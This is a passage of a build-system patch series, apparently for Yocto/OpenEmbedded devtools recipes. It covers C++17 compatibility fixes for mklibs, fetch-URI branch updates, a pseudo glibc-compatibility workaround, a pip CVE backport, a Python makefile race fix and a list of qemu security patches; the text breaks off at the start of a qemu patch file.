+diff --git a/src/mklibs-readelf/elf.cpp b/src/mklibs-readelf/elf.cpp
+index 0e4c0f3..2e6d0f6 100644
+--- a/src/mklibs-readelf/elf.cpp
++++ b/src/mklibs-readelf/elf.cpp
+@@ -36,7 +36,7 @@ file::~file () throw ()
+ delete *it;
+ }
+
+-file *file::open (const char *filename) throw (std::bad_alloc, std::runtime_error)
++file *file::open (const char *filename) throw ()
+ {
+ struct stat buf;
+ int fd;
+@@ -72,7 +72,7 @@ file *file::open (const char *filename) throw (std::bad_alloc, std::runtime_erro
+ }
+
+ template<typename _class>
+-file *file::open_class(uint8_t *mem, size_t len) throw (std::bad_alloc, std::runtime_error)
++file *file::open_class(uint8_t *mem, size_t len) throw ()
+ {
+ switch (mem[EI_DATA])
+ {
+@@ -86,7 +86,7 @@ file *file::open_class(uint8_t *mem, size_t len) throw (std::bad_alloc, std::run
+ }
+
+ template <typename _class, typename _data>
+-file_data<_class, _data>::file_data(uint8_t *mem, size_t len) throw (std::bad_alloc, std::runtime_error)
++file_data<_class, _data>::file_data(uint8_t *mem, size_t len) throw ()
+ : file(mem, len)
+ {
+ if (mem[EI_CLASS] != _class::id)
+@@ -190,7 +190,7 @@ section_data<_class, _data>::section_data(Shdr *shdr, uint8_t *mem) throw ()
+ }
+
+ template <typename _class, typename _data>
+-void section_data<_class, _data>::update(const file &file) throw (std::bad_alloc)
++void section_data<_class, _data>::update(const file &file) throw ()
+ {
+ const section_type<section_type_STRTAB> &section =
+ dynamic_cast<const section_type<section_type_STRTAB> &>(file.get_section(file.get_shstrndx()));
+@@ -204,7 +204,7 @@ section_type<section_type_DYNAMIC>::~section_type() throw ()
+ }
+
+ template <typename _class, typename _data>
+-section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data>(header, mem)
+ {
+ if (this->type != SHT_DYNAMIC)
+@@ -221,7 +221,7 @@ section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, ui
+ }
+
+ template <typename _class, typename _data>
+-void section_real<_class, _data, section_type_DYNAMIC>::update(const file &file) throw (std::bad_alloc)
++void section_real<_class, _data, section_type_DYNAMIC>::update(const file &file) throw ()
+ {
+ section_data<_class, _data>::update(file);
+
+@@ -243,7 +243,7 @@ section_type<section_type_DYNSYM>::~section_type() throw ()
+ }
+
+ template <typename _class, typename _data>
+-section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data>(header, mem)
+ {
+ if (this->type != SHT_DYNSYM)
+@@ -260,7 +260,7 @@ section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uin
+ }
+
+ template <typename _class, typename _data>
+-void section_real<_class, _data, section_type_DYNSYM>::update(const file &file) throw (std::bad_alloc)
++void section_real<_class, _data, section_type_DYNSYM>::update(const file &file) throw ()
+ {
+ section_data<_class, _data>::update (file);
+
+@@ -285,7 +285,7 @@ const version_definition *section_type<section_type_GNU_VERDEF>::get_version_def
+ }
+
+ template <typename _class, typename _data>
+-section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data>(header, mem)
+ {
+ if (this->type != SHT_GNU_verdef)
+@@ -307,7 +307,7 @@ section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header,
+ }
+
+ template <typename _class, typename _data>
+-void section_real<_class, _data, section_type_GNU_VERDEF>::update(const file &file) throw (std::bad_alloc)
++void section_real<_class, _data, section_type_GNU_VERDEF>::update(const file &file) throw ()
+ {
+ section_data<_class, _data>::update(file);
+
+@@ -333,7 +333,7 @@ const version_requirement_entry *section_type<section_type_GNU_VERNEED>::get_ver
+
+ template <typename _class, typename _data>
+ section_real<_class, _data, section_type_GNU_VERNEED>::
+-section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real(Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data> (header, mem)
+ {
+ if (this->type != SHT_GNU_verneed)
+@@ -355,7 +355,7 @@ section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
+ }
+
+ template <typename _class, typename _data>
+-void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &file) throw (std::bad_alloc)
++void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &file) throw ()
+ {
+ section_data<_class, _data>::update(file);
+
+@@ -372,7 +372,7 @@ void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &f
+
+ template <typename _class, typename _data>
+ section_real<_class, _data, section_type_GNU_VERSYM>::
+-section_real (Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real (Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data> (header, mem)
+ {
+ if (this->type != SHT_GNU_versym)
+@@ -399,7 +399,7 @@ segment_data<_class, _data>::segment_data (Phdr *phdr, uint8_t *mem) throw ()
+ }
+
+ template <typename _class, typename _data>
+-segment_real<_class, _data, segment_type_INTERP>::segment_real (Phdr *header, uint8_t *mem) throw (std::bad_alloc)
++segment_real<_class, _data, segment_type_INTERP>::segment_real (Phdr *header, uint8_t *mem) throw ()
+ : segment_data<_class, _data> (header, mem)
+ {
+ if (this->type != PT_INTERP)
+@@ -429,13 +429,13 @@ dynamic_data<_class, _data>::dynamic_data (Dyn *dyn) throw ()
+ }
+
+ template <typename _class, typename _data>
+-void dynamic_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++void dynamic_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+ if (is_string)
+ val_string = section.get_string(val);
+ }
+
+-std::string symbol::get_version () const throw (std::bad_alloc)
++std::string symbol::get_version () const throw ()
+ {
+ if (verneed)
+ return verneed->get_name();
+@@ -445,7 +445,7 @@ std::string symbol::get_version () const throw (std::bad_alloc)
+ return "Base";
+ }
+
+-std::string symbol::get_version_file () const throw (std::bad_alloc)
++std::string symbol::get_version_file () const throw ()
+ {
+ if (verneed)
+ return verneed->get_file();
+@@ -453,7 +453,7 @@ std::string symbol::get_version_file () const throw (std::bad_alloc)
+ return "None";
+ }
+
+-std::string symbol::get_name_version () const throw (std::bad_alloc)
++std::string symbol::get_name_version () const throw ()
+ {
+ std::string ver;
+
+@@ -478,13 +478,13 @@ symbol_data<_class, _data>::symbol_data (Sym *sym) throw ()
+ }
+
+ template <typename _class, typename _data>
+-void symbol_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++void symbol_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+ name_string = section.get_string(name);
+ }
+
+ template <typename _class, typename _data>
+-void symbol_data<_class, _data>::update_version(const file &file, uint16_t index) throw (std::bad_alloc)
++void symbol_data<_class, _data>::update_version(const file &file, uint16_t index) throw ()
+ {
+ if (!file.get_section_GNU_VERSYM())
+ return;
+@@ -531,13 +531,13 @@ version_definition_data<_class, _data>::version_definition_data (Verdef *verdef)
+ }
+
+ template <typename _class, typename _data>
+-void version_definition_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++void version_definition_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+ for (std::vector<uint32_t>::iterator it = names.begin(); it != names.end(); ++it)
+ names_string.push_back(section.get_string(*it));
+ }
+
+-version_requirement::version_requirement() throw (std::bad_alloc)
++version_requirement::version_requirement() throw ()
+ : file_string("None")
+ { }
+
+@@ -561,7 +561,7 @@ version_requirement_data<_class, _data>::version_requirement_data (Verneed *vern
+
+ template <typename _class, typename _data>
+ void version_requirement_data<_class, _data>::
+-update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+ file_string = section.get_string(file);
+
+@@ -596,7 +596,7 @@ version_requirement_entry_data(Vernaux *vna, const version_requirement &verneed)
+
+ template <typename _class, typename _data>
+ void version_requirement_entry_data<_class, _data>::
+-update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+ name_string = section.get_string(name);
+ }
+diff --git a/src/mklibs-readelf/elf.hpp b/src/mklibs-readelf/elf.hpp
+index 70e61cd..afb0c9e 100644
+--- a/src/mklibs-readelf/elf.hpp
++++ b/src/mklibs-readelf/elf.hpp
+@@ -49,7 +49,7 @@ namespace Elf
+ const uint16_t get_shstrndx() const throw () { return shstrndx; }
+
+ const std::vector<section *> get_sections() const throw () { return sections; };
+- const section &get_section(unsigned int i) const throw (std::out_of_range) { return *sections.at(i); };
++ const section &get_section(unsigned int i) const throw () { return *sections.at(i); };
+ const section_type<section_type_DYNAMIC> *get_section_DYNAMIC() const throw () { return section_DYNAMIC; };
+ const section_type<section_type_DYNSYM> *get_section_DYNSYM() const throw () { return section_DYNSYM; };
+ const section_type<section_type_GNU_VERDEF> *get_section_GNU_VERDEF() const throw () { return section_GNU_VERDEF; };
+@@ -59,13 +59,13 @@ namespace Elf
+ const std::vector<segment *> get_segments() const throw () { return segments; };
+ const segment_type<segment_type_INTERP> *get_segment_INTERP() const throw () { return segment_INTERP; };
+
+- static file *open(const char *filename) throw (std::bad_alloc, std::runtime_error);
++ static file *open(const char *filename) throw ();
+
+ protected:
+- file(uint8_t *mem, size_t len) throw (std::bad_alloc) : mem(mem), len(len) { }
++ file(uint8_t *mem, size_t len) throw () : mem(mem), len(len) { }
+
+ template<typename _class>
+- static file *open_class(uint8_t *, size_t) throw (std::bad_alloc, std::runtime_error);
++ static file *open_class(uint8_t *, size_t) throw ();
+
+ uint16_t type;
+ uint16_t machine;
+@@ -128,7 +128,7 @@ namespace Elf
+ class section_type<section_type_STRTAB> : public virtual section
+ {
+ public:
+- std::string get_string(uint32_t offset) const throw (std::bad_alloc)
++ std::string get_string(uint32_t offset) const throw ()
+ {
+ return std::string(reinterpret_cast<const char *> (mem + offset));
+ }
+@@ -263,10 +263,10 @@ namespace Elf
+ uint8_t get_bind () const throw () { return bind; }
+ uint8_t get_type () const throw () { return type; }
+ const std::string &get_name_string() const throw () { return name_string; }
+- std::string get_version() const throw (std::bad_alloc);
+- std::string get_version_file() const throw (std::bad_alloc);
++ std::string get_version() const throw ();
++ std::string get_version_file() const throw ();
+ uint16_t get_version_data() const throw () { return versym; }
+- std::string get_name_version() const throw (std::bad_alloc);
++ std::string get_name_version() const throw ();
+
+ protected:
+ uint32_t name;
+@@ -305,7 +305,7 @@ namespace Elf
+ class version_requirement
+ {
+ public:
+- version_requirement() throw (std::bad_alloc);
++ version_requirement() throw ();
+ virtual ~version_requirement () throw () { }
+
+ const std::string &get_file() const throw () { return file_string; }
+diff --git a/src/mklibs-readelf/elf_data.hpp b/src/mklibs-readelf/elf_data.hpp
+index 05effee..3871982 100644
+--- a/src/mklibs-readelf/elf_data.hpp
++++ b/src/mklibs-readelf/elf_data.hpp
+@@ -94,7 +94,7 @@ namespace Elf
+ class file_data : public file
+ {
+ public:
+- file_data(uint8_t *, size_t len) throw (std::bad_alloc, std::runtime_error);
++ file_data(uint8_t *, size_t len) throw ();
+
+ const uint8_t get_class() const throw () { return _class::id; }
+ const uint8_t get_data() const throw () { return _data::id; }
+@@ -109,7 +109,7 @@ namespace Elf
+ public:
+ section_data(Shdr *, uint8_t *) throw ();
+
+- virtual void update(const file &) throw (std::bad_alloc);
++ virtual void update(const file &) throw ();
+ };
+
+ template <typename _class, typename _data, typename _type>
+@@ -133,9 +133,9 @@ namespace Elf
+ typedef typename _elfdef<_class>::Shdr Shdr;
+
+ public:
+- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++ section_real(Shdr *, uint8_t *) throw ();
+
+- void update(const file &) throw (std::bad_alloc);
++ void update(const file &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -147,9 +147,9 @@ namespace Elf
+ typedef typename _elfdef<_class>::Shdr Shdr;
+
+ public:
+- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++ section_real(Shdr *, uint8_t *) throw ();
+
+- void update(const file &) throw (std::bad_alloc);
++ void update(const file &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -161,9 +161,9 @@ namespace Elf
+ typedef typename _elfdef<_class>::Shdr Shdr;
+
+ public:
+- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++ section_real(Shdr *, uint8_t *) throw ();
+
+- void update(const file &) throw (std::bad_alloc);
++ void update(const file &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -175,9 +175,9 @@ namespace Elf
+ typedef typename _elfdef<_class>::Shdr Shdr;
+
+ public:
+- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++ section_real(Shdr *, uint8_t *) throw ();
+
+- void update(const file &) throw (std::bad_alloc);
++ void update(const file &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -189,7 +189,7 @@ namespace Elf
+ typedef typename _elfdef<_class>::Shdr Shdr;
+
+ public:
+- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++ section_real(Shdr *, uint8_t *) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -220,7 +220,7 @@ namespace Elf
+ typedef typename _elfdef<_class>::Phdr Phdr;
+
+ public:
+- segment_real (Phdr *, uint8_t *) throw (std::bad_alloc);
++ segment_real (Phdr *, uint8_t *) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -232,7 +232,7 @@ namespace Elf
+ public:
+ dynamic_data (Dyn *) throw ();
+
+- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
++ void update_string(const section_type<section_type_STRTAB> &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -244,8 +244,8 @@ namespace Elf
+ public:
+ symbol_data (Sym *) throw ();
+
+- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
+- virtual void update_version (const file &, uint16_t) throw (std::bad_alloc);
++ void update_string(const section_type<section_type_STRTAB> &) throw ();
++ virtual void update_version (const file &, uint16_t) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -257,7 +257,7 @@ namespace Elf
+
+ version_definition_data (Verdef *) throw ();
+
+- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
++ void update_string(const section_type<section_type_STRTAB> &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -269,7 +269,7 @@ namespace Elf
+
+ version_requirement_data (Verneed *) throw ();
+
+- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
++ void update_string(const section_type<section_type_STRTAB> &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -280,7 +280,7 @@ namespace Elf
+
+ version_requirement_entry_data (Vernaux *, const version_requirement &) throw ();
+
+- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
++ void update_string(const section_type<section_type_STRTAB> &) throw ();
+ };
+ }
+
+--
+2.11.0
+
diff --git a/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb b/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb
index 1784af1f4c6..07142e57e01 100644
--- a/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb
+++ b/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb
@@ -12,6 +12,7 @@ SRC_URI = "http://snapshot.debian.org/archive/debian/20180828T214102Z/pool/main/
file://avoid-failure-on-symbol-provided-by-application.patch \
file://show-GNU-unique-symbols-as-provided-symbols.patch \
file://fix_cross_compile.patch \
+ file://remove-deprecated-exception-specification-cpp17.patch \
"
SRC_URI[md5sum] = "6b6eeb9b4016c6a7317acc28c89e32cc"
diff --git a/meta/recipes-devtools/mtd/mtd-utils_git.bb b/meta/recipes-devtools/mtd/mtd-utils_git.bb
index 105a68dad8f..de7bdcd9693 100644
--- a/meta/recipes-devtools/mtd/mtd-utils_git.bb
+++ b/meta/recipes-devtools/mtd/mtd-utils_git.bb
@@ -14,7 +14,7 @@ RDEPENDS_mtd-utils-tests += "bash"
PV = "2.1.2"
SRCREV = "7b986779342021bda87c04da3bf729718736d8ab"
-SRC_URI = "git://git.infradead.org/mtd-utils.git \
+SRC_URI = "git://git.infradead.org/mtd-utils.git;branch=master \
file://add-exclusion-to-mkfs-jffs2-git-2.patch \
"
diff --git a/meta/recipes-devtools/ninja/ninja_1.10.2.bb b/meta/recipes-devtools/ninja/ninja_1.10.2.bb
index 2a39b2d2161..79328583eec 100644
--- a/meta/recipes-devtools/ninja/ninja_1.10.2.bb
+++ b/meta/recipes-devtools/ninja/ninja_1.10.2.bb
@@ -8,7 +8,7 @@ DEPENDS = "re2c-native ninja-native"
SRCREV = "e72d1d581c945c158ed68d9bc48911063022a2c6"
-SRC_URI = "git://github.com/ninja-build/ninja.git;branch=release"
+SRC_URI = "git://github.com/ninja-build/ninja.git;branch=release;protocol=https"
UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>.*)"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-devtools/patchelf/patchelf_0.12.bb b/meta/recipes-devtools/patchelf/patchelf_0.12.bb
index 7c97ea07898..390a8110da8 100644
--- a/meta/recipes-devtools/patchelf/patchelf_0.12.bb
+++ b/meta/recipes-devtools/patchelf/patchelf_0.12.bb
@@ -4,7 +4,7 @@ HOMEPAGE = "https://github.com/NixOS/patchelf"
LICENSE = "GPLv3"
-SRC_URI = "git://github.com/NixOS/patchelf;protocol=https \
+SRC_URI = "git://github.com/NixOS/patchelf;protocol=https;branch=master \
file://handle-read-only-files.patch \
file://6edec83653ce1b5fc201ff6db93b966394766814.patch \
file://alignmentfix.patch \
diff --git a/meta/recipes-devtools/pseudo/files/build-oldlibc b/meta/recipes-devtools/pseudo/files/build-oldlibc
new file mode 100755
index 00000000000..85c438de4e0
--- /dev/null
+++ b/meta/recipes-devtools/pseudo/files/build-oldlibc
@@ -0,0 +1,20 @@
+#!/bin/sh
+#
+# Script to re-generate pseudo-prebuilt-2.33.tar.xz
+#
+# Copyright (C) 2021 Richard Purdie
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+
+for i in x86_64 aarch64 i686; do
+ if [ ! -e $i-nativesdk-libc.tar.xz ]; then
+ wget http://downloads.yoctoproject.org/releases/uninative/3.2/$i-nativesdk-libc.tar.xz
+ fi
+ tar -xf $i-nativesdk-libc.tar.xz --wildcards \*/lib/libpthread\* \*/lib/libdl\*
+ cd $i-linux/lib
+ ln -s libdl.so.2 libdl.so
+ ln -s libpthread.so.0 libpthread.so
+ cd ../..
+done
+tar -cJf pseudo-prebuilt-2.33.tar.xz *-linux \ No newline at end of file
diff --git a/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch b/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch
new file mode 100644
index 00000000000..c453b5f7358
--- /dev/null
+++ b/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch
@@ -0,0 +1,57 @@
+If we link against a newer glibc 2.34 and then try and our LD_PRELOAD is run against a
+binary on a host with an older libc, we see symbol errors since in glibc 2.34, pthread
+and dl are merged into libc itself.
+
+We need to use the older form of linking so use glibc binaries from an older release
+to force this. We only use minimal symbols from these anyway.
+
+pthread_atfork is problematic, particularly on arm so use the internal glibc routine
+it maps too. This was always present in the main libc from 2.3.2 onwards.
+
+Yes this is horrible. Better solutions welcome.
+
+There is more info in the bug: [YOCTO #14521]
+
+Upstream-Status: Inappropriate [this patch is native and nativesdk]
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Tweak library search order, make prebuilt lib ahead of recipe lib
+Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
+---
+ Makefile.in | 2 +-
+ pseudo_wrappers.c | 5 ++++-
+ 2 files changed, 5 insertions(+), 2 deletions(-)
+
+diff --git a/Makefile.in b/Makefile.in
+--- a/Makefile.in
++++ b/Makefile.in
+@@ -120,7 +120,7 @@ $(PSEUDODB): pseudodb.o $(SHOBJS) $(DBOBJS) pseudo_ipc.o | $(BIN)
+ libpseudo: $(LIBPSEUDO)
+
+ $(LIBPSEUDO): $(WRAPOBJS) pseudo_client.o pseudo_ipc.o $(SHOBJS) | $(LIB)
+- $(CC) $(CFLAGS) $(CFLAGS_PSEUDO) -shared -o $(LIBPSEUDO) \
++ $(CC) $(CFLAGS) -Lprebuilt/$(shell uname -m)-linux/lib/ $(CFLAGS_PSEUDO) -shared -o $(LIBPSEUDO) \
+ pseudo_client.o pseudo_ipc.o \
+ $(WRAPOBJS) $(SHOBJS) $(LDFLAGS) $(CLIENT_LDFLAGS)
+
+diff --git a/pseudo_wrappers.c b/pseudo_wrappers.c
+--- a/pseudo_wrappers.c
++++ b/pseudo_wrappers.c
+@@ -100,10 +100,13 @@ static void libpseudo_atfork_child(void)
+ pseudo_mutex_holder = 0;
+ }
+
++extern void *__dso_handle;
++extern int __register_atfork (void (*) (void), void (*) (void), void (*) (void), void *);
++
+ static void
+ _libpseudo_init(void) {
+ if (!_libpseudo_initted)
+- pthread_atfork(NULL, NULL, libpseudo_atfork_child);
++ __register_atfork (NULL, NULL, libpseudo_atfork_child, &__dso_handle == NULL ? NULL : __dso_handle);
+
+ pseudo_getlock();
+ pseudo_antimagic();
+--
+2.27.0
+
diff --git a/meta/recipes-devtools/pseudo/pseudo.inc b/meta/recipes-devtools/pseudo/pseudo.inc
index 65d6e5068db..e6512bc6e68 100644
--- a/meta/recipes-devtools/pseudo/pseudo.inc
+++ b/meta/recipes-devtools/pseudo/pseudo.inc
@@ -112,6 +112,19 @@ do_compile_prepend_class-nativesdk () {
fi
}
+do_compile_append_class-native () {
+ if [ '${@bb.data.inherits_class('uninative', d)}' = 'True' ]; then
+ for i in PSEUDO_PORT_UNIX_SYNCFS PSEUDO_PORT_UIDS_GENERIC PSEUDO_PORT_LINUX_NEWCLONE PSEUDO_PORT_LINUX_XATTR PSEUDO_PORT_LINUX_STATVFS; do
+ grep $i.1 ${S}/pseudo_ports.h
+ if [ $? != 0 ]; then
+ echo "$i not enabled in pseudo which is incompatible with uninative"
+ exit 1
+ fi
+ done
+ fi
+}
+
+
do_install () {
oe_runmake 'DESTDIR=${D}' ${MAKEOPTS} 'LIB=lib/pseudo/lib$(MARK64)' install
}
diff --git a/meta/recipes-devtools/pseudo/pseudo_git.bb b/meta/recipes-devtools/pseudo/pseudo_git.bb
index 4eab133128a..1a5d230c692 100644
--- a/meta/recipes-devtools/pseudo/pseudo_git.bb
+++ b/meta/recipes-devtools/pseudo/pseudo_git.bb
@@ -5,8 +5,15 @@ SRC_URI = "git://git.yoctoproject.org/pseudo;branch=oe-core \
file://fallback-passwd \
file://fallback-group \
"
+SRC_URI:append:class-native = " \
+ http://downloads.yoctoproject.org/mirror/sources/pseudo-prebuilt-2.33.tar.xz;subdir=git/prebuilt;name=prebuilt \
+ file://older-glibc-symbols.patch"
+SRC_URI:append:class-nativesdk = " \
+ http://downloads.yoctoproject.org/mirror/sources/pseudo-prebuilt-2.33.tar.xz;subdir=git/prebuilt;name=prebuilt \
+ file://older-glibc-symbols.patch"
+SRC_URI[prebuilt.sha256sum] = "ed9f456856e9d86359f169f46a70ad7be4190d6040282b84c8d97b99072485aa"
-SRCREV = "ee24ebec9e5a11dd5208c9be2870f35eab3b9e20"
+SRCREV = "d34f2f6cedccf8488730001bcbde6bb7499f8814"
S = "${WORKDIR}/git"
PV = "1.9.0+git${SRCPV}"
diff --git a/meta/recipes-devtools/python/python3-pip/0001-Don-t-split-git-references-on-unicode-separators.patch b/meta/recipes-devtools/python/python3-pip/0001-Don-t-split-git-references-on-unicode-separators.patch
new file mode 100644
index 00000000000..f85353668ab
--- /dev/null
+++ b/meta/recipes-devtools/python/python3-pip/0001-Don-t-split-git-references-on-unicode-separators.patch
@@ -0,0 +1,40 @@
+From 25c1b92b1add0b81afe2fc6f9e82f66738a2d800 Mon Sep 17 00:00:00 2001
+From: Trevor Gamblin <trevor.gamblin@windriver.com>
+Date: Thu, 22 Jul 2021 09:57:53 -0400
+Subject: [PATCH] Don't split git references on unicode separators
+
+Upstream-Status: Backport
+(https://github.com/pypa/pip/commit/e46bdda9711392fec0c45c1175bae6db847cb30b)
+
+CVE: CVE-2021-3572
+
+Signed-off-by: Trevor Gamblin <trevor.gamblin@windriver.com>
+---
+ src/pip/_internal/vcs/git.py | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/src/pip/_internal/vcs/git.py b/src/pip/_internal/vcs/git.py
+index 7483303a9..d706064e7 100644
+--- a/src/pip/_internal/vcs/git.py
++++ b/src/pip/_internal/vcs/git.py
+@@ -137,9 +137,15 @@ class Git(VersionControl):
+ output = cls.run_command(['show-ref', rev], cwd=dest,
+ show_stdout=False, on_returncode='ignore')
+ refs = {}
+- for line in output.strip().splitlines():
++ # NOTE: We do not use splitlines here since that would split on other
++ # unicode separators, which can be maliciously used to install a
++ # different revision.
++ for line in output.strip().split("\n"):
++ line = line.rstrip("\r")
++ if not line:
++ continue
+ try:
+- sha, ref = line.split()
++ sha, ref = line.split(" ", maxsplit=2)
+ except ValueError:
+ # Include the offending line to simplify troubleshooting if
+ # this error ever occurs.
+--
+2.31.1
+
diff --git a/meta/recipes-devtools/python/python3-pip_20.0.2.bb b/meta/recipes-devtools/python/python3-pip_20.0.2.bb
index 99eeea2edf4..9242d0e82ed 100644
--- a/meta/recipes-devtools/python/python3-pip_20.0.2.bb
+++ b/meta/recipes-devtools/python/python3-pip_20.0.2.bb
@@ -6,7 +6,9 @@ LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=8ba06d529c955048e5ddd7c45459eb2e"
DEPENDS += "python3 python3-setuptools-native"
-SRC_URI += "file://0001-change-shebang-to-python3.patch"
+SRC_URI += "file://0001-change-shebang-to-python3.patch \
+ file://0001-Don-t-split-git-references-on-unicode-separators.patch \
+ "
SRC_URI[md5sum] = "7d42ba49b809604f0df3d55df1c3fd86"
SRC_URI[sha256sum] = "7db0c8ea4c7ea51c8049640e8e6e7fde949de672bfa4949920675563a5a6967f"
diff --git a/meta/recipes-devtools/python/python3/makerace.patch b/meta/recipes-devtools/python/python3/makerace.patch
new file mode 100644
index 00000000000..96744cb5570
--- /dev/null
+++ b/meta/recipes-devtools/python/python3/makerace.patch
@@ -0,0 +1,23 @@
+libainstall installs python-config.py but the .pyc cache files are generated
+by the libinstall target. This means some builds may not generate the pyc files
+for python-config.py depending on the order things happen in. This means builds
+are not always reproducible.
+
+Add a dependency to avoid the race.
+
+Upstream-Status: Pending
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Index: Python-3.9.6/Makefile.pre.in
+===================================================================
+--- Python-3.9.6.orig/Makefile.pre.in
++++ Python-3.9.6/Makefile.pre.in
+@@ -1486,7 +1486,7 @@ LIBSUBDIRS= tkinter tkinter/test tkinter
+ venv venv/scripts venv/scripts/common venv/scripts/posix \
+ curses pydoc_data \
+ zoneinfo
+-libinstall: build_all $(srcdir)/Modules/xxmodule.c
++libinstall: build_all $(srcdir)/Modules/xxmodule.c libainstall
+ @for i in $(SCRIPTDIR) $(LIBDEST); \
+ do \
+ if test ! -d $(DESTDIR)$$i; then \
diff --git a/meta/recipes-devtools/python/python3_3.9.5.bb b/meta/recipes-devtools/python/python3_3.9.5.bb
index 82177f4a183..2b05bd530e2 100644
--- a/meta/recipes-devtools/python/python3_3.9.5.bb
+++ b/meta/recipes-devtools/python/python3_3.9.5.bb
@@ -31,6 +31,7 @@ SRC_URI = "http://www.python.org/ftp/python/${PV}/Python-${PV}.tar.xz \
file://0020-configure.ac-setup.py-do-not-add-a-curses-include-pa.patch \
file://0001-Lib-sysconfig.py-use-libdir-values-from-configuratio.patch \
file://0001-Skip-failing-tests-due-to-load-variability-on-YP-AB.patch \
+ file://makerace.patch \
"
SRC_URI_append_class-native = " \
diff --git a/meta/recipes-devtools/qemu/qemu.inc b/meta/recipes-devtools/qemu/qemu.inc
index 3921546df75..463339e42b4 100644
--- a/meta/recipes-devtools/qemu/qemu.inc
+++ b/meta/recipes-devtools/qemu/qemu.inc
@@ -57,6 +57,19 @@ SRC_URI = "https://download.qemu.org/${BPN}-${PV}.tar.xz \
file://CVE-2020-27821.patch \
file://CVE-2021-20263.patch \
file://CVE-2021-3392.patch \
+ file://0001-vhost-user-gpu-fix-memory-disclosure-in-virgl_cmd_ge.patch \
+ file://0002-vhost-user-gpu-fix-resource-leak-in-vg_resource_crea.patch \
+ file://0003-vhost-user-gpu-fix-memory-leak-in-vg_resource_attach.patch \
+ file://0004-vhost-user-gpu-fix-memory-leak-while-calling-vg_reso.patch \
+ file://0005-vhost-user-gpu-fix-memory-leak-in-virgl_cmd_resource.patch \
+ file://0006-vhost-user-gpu-fix-memory-leak-in-virgl_resource_att.patch \
+ file://0007-vhost-user-gpu-fix-OOB-write-in-virgl_cmd_get_capset.patch \
+ file://CVE-2021-3527-1.patch \
+ file://CVE-2021-3527-2.patch \
+ file://CVE-2021-3582.patch \
+ file://CVE-2021-3607.patch \
+ file://CVE-2021-3608.patch \
+ file://CVE-2021-3682.patch \
"
UPSTREAM_CHECK_REGEX = "qemu-(?P<pver>\d+(\.\d+)+)\.tar"
diff --git a/meta/recipes-devtools/qemu/qemu/0001-vhost-user-gpu-fix-memory-disclosure-in-virgl_cmd_ge.patch b/meta/recipes-devtools/qemu/qemu/0001-vhost-user-gpu-fix-memory-disclosure-in-virgl_cmd_ge.patch
new file mode 100644
